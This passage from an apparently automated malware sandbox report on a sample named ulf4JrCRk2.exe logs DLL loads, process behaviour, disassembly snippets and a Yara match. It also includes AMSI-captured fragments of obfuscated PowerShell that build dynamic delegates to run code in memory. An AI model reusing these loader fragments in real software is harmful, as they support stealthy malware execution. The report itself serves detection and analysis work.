              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: ulf4JrCRk2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb54= source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: re.pdbKN source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdb! source: powershell.exe, 00000002.00000002.1568722465.0000000008453000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1562020960.0000000007185000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Mutualize $Ulvehunds76nsubstantiate240 $Fejrede), (Imbecil @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Birdeen = [AppDomain]::CurrentDomain.GetAssembli
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Guestwise)), $Centring).DefineDynamicModule($Sperrylite, $false).DefineType($Bedragene, $radiodontist, [System.MulticastDelegate])$Res
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeCode function: 0_2_0040601C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040601C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0456CE80 push eax; mov dword ptr [esp], edx2_2_0456CE94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0744B1A7 push esp; retf 2_2_0744B1AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0744AFB5 push esi; retf 2_2_0744AFBE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0744AE3B push 8B6BE6C2h; iretd 2_2_0744AE49
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D640A8 push ss; iretd 2_2_08D640BC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D64816 push edx; iretd 2_2_08D64829
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D59375 push es; retf 2_2_08D59376
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08D635C9 push ebx; ret 2_2_08D635CA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_02E30C6D push edi; retf 5_2_02E30C7A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_040D35C9 push ebx; ret 5_2_040D35CA
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_040D40A8 push ss; iretd 5_2_040D40BC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_040C9375 push es; retf 5_2_040C9376
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_040D4816 push edx; iretd 5_2_040D4829

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
              Source: C:\Users\user\Desktop\ulf4JrCRk2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
